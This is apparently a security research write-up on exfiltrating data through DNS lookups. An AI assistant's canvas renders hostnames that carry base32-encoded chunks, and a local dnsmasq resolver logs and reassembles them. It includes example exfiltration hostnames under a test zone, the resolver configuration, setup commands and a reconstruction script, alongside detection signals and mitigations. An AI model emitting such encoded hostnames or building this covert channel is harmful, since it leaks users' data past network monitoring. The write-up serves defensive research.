Research Disclosure: A controlled security research experiment demonstrating DNS-based data exfiltration through browser rendering behavior.
This repository documents a controlled research experiment that demonstrates how DNS lookups triggered by rendered content can be used to exfiltrate data. The technique leverages the browser's automatic DNS resolution behavior when rendering hostnames, without requiring HTTP requests or file uploads.
Key Insight: The model only prints strings. The canvas renders those strings. The browser then issues DNS queries for hostnames that appear in the rendered content.
- Executive Summary
- How It Works
- System Architecture
- Implementation
- Detection & Mitigation
- Lab Setup
- Ethical Considerations
- Contributing
This research demonstrates a method to exfiltrate small payloads (such as images) by encoding data into DNS query names. By operating a local resolver that is authoritative for a private test zone, the full query name carries the payload in its subdomain labels and is visible in resolver logs.
Scope: Controlled lab environment with non-sensitive data only.
βββββββββββββββ ββββββββββββββββ βββββββββββββββ
β Encode βββββββΆβ Canvas βββββββΆβ Browser β
β Payload β β Renders β β Resolves β
βββββββββββββββ ββββββββββββββββ βββββββββββββββ
β
βΌ
βββββββββββββββ
βLocal Resolverβ
β Logs β
βββββββββββββββ
β
βΌ
βββββββββββββββ
β Reconstruct β
β Payload β
βββββββββββββββ
- Encode: Convert payload to DNS-safe alphabet (base32/base64url)
- Chunk: Split into DNS-compliant segments (β€63 chars per label, β€253 total)
- Index: Add sequence markers for deterministic reassembly
- Trigger: Canvas renders hostnames with embedded chunks
- Resolve: Browser automatically performs DNS lookups
- Capture: Local authoritative resolver logs full query names
- Reconstruct: Parse logs, sort by index, decode payload
p001_db.MFRGGZDFMZTQ====.exfil.lab
p002_db.MFWWK3TLNB2GI===.exfil.lab
p003_db.MZXW6YTBOI======.exfil.lab
- Client: macOS laptop with ChatGPT canvas in browser
- Resolver:
dnsmasqrunning locally- Acts as normal forwarder for internet
- Authoritative for private test zone
- Zone: Private test zone (e.g.,
exfil.lab) not delegated publicly
<index><separator><payload-chunk>[<separator><checksum>]
Constraints:
- Character set: DNS-legal hostnames only
- Label length: β€63 characters
- Total FQDN: β€253 characters
- Each chunk must be unique (prevent cache collapsing)
Minimal dnsmasq configuration:
# Loopback only
listen-address=127.0.0.1,::1
port=53
bind-interfaces
# Normal recursion for everything else
server=1.1.1.1
server=2606:4700:4700::1111
# Make the test zone local and authoritative
local=/exfil.lab/
# Wildcard reply for any name in the zone
address=/.exfil.lab/127.0.0.1
# Per-query logging
log-queries
log-facility=/opt/homebrew/var/log/dnsmasq.log
Critical Settings:
local=/exfil.lab/- Stops forwarding, makes resolver authoritativeaddress=/.exfil.lab/127.0.0.1- Returns valid answer for all nameslog-queries- Captures complete query names
Ensure macOS network settings list 127.0.0.1 as the first DNS server:
# Check current DNS servers
scutil --dns
# Set DNS server (Network Preferences > Advanced > DNS)DNS Layer:
- Many unique subdomains under one zone in short time window
- Leftmost labels with high Shannon entropy (>40 chars)
- Clear sequence markers (
p001,p002, etc.) - Fixed loopback addresses for all responses
Network Monitoring:
# Alert criteria
- First label length > 40 characters
- High uniqueness ratio under single zone
- Burst of NXDOMAIN responses
- Unusual encoding patterns (base32/base64)- β Treat untrusted hostnames as inert text
- β Use strict allow-lists for external resources
- β Apply Content Security Policy (CSP)
- β Limit hostname count/length per render
- β Prefer offline rendering for previews
- β Centralize DNS egress through controlled resolvers
- β Block direct access to public DoH/DoT endpoints
- β Deploy Response Policy Zones (RPZ)
- β Alert on high-entropy DNS labels
- β Monitor DNS query uniqueness ratios
Content-Security-Policy:
default-src 'self';
img-src 'self' https://trusted-cdn.example.com;
connect-src 'none';
# Install dnsmasq (macOS)
brew install dnsmasq
# Create log directory
mkdir -p /opt/homebrew/var/log-
Configure dnsmasq:
cp dnsmasq.conf.example /opt/homebrew/etc/dnsmasq.conf
-
Start resolver:
sudo brew services start dnsmasq
-
Verify setup:
dig @127.0.0.1 test.exfil.lab
-
Monitor logs:
tail -f /opt/homebrew/var/log/dnsmasq.log
# See scripts/reconstruct.py for full implementation
import re
import base64
def parse_dnsmasq_logs(log_file, zone):
"""Extract and reconstruct payload from DNS logs"""
chunks = []
pattern = rf'query\[A\] (p\d+)_db\.([^.]+)\.{zone}'
with open(log_file) as f:
for line in f:
match = re.search(pattern, line)
if match:
index = int(match.group(1)[1:])
payload = match.group(2)
chunks.append((index, payload))
# Sort by index and concatenate
chunks.sort(key=lambda x: x[0])
encoded = ''.join(c[1] for c in chunks)
# Decode from base32
return base64.b32decode(encoded)- Throughput: Modest - suitable for small payloads only
- Detectability: Aggressive parallelism increases detection risk
- False Positives: Some legitimate infrastructure uses long/hex labels
- Scope: Controlled research with non-sensitive data
This research demonstrates that:
- Security boundaries exist at rendering and network layers
- Canvas hardening and DNS egress controls are critical
- Traditional payload inspection may miss DNS-based channels
- Multiple detection signals are needed for robust monitoring
This research is intended for:
- β Security research and education
- β Defensive security improvements
- β Controlled lab environments
- β Authorized penetration testing
NOT for:
- β Unauthorized access or data theft
- β Production systems without permission
- β Malicious purposes
Responsible Disclosure: This research has been shared with relevant parties for security improvements.
Contributions are welcome! Please:
- Fork the repository
- Create a feature branch
- Submit a pull request with clear description
Areas for contribution:
- Additional detection signatures
- Reconstruction tooling
- Cross-platform testing
- Documentation improvements
MIT License - See LICENSE file for details
Kai Aizen | SnailSploit
- Research Blog: https://Snailsploit.com
- Full Logs: [Link to logs]
- Flow Diagram: dns_exfil_flow.png
Thank you to the security research community for responsible disclosure practices and collaborative defense improvements.
Disclaimer: This research is provided for educational and defensive security purposes only. Users are responsible for ensuring compliance with applicable laws and regulations.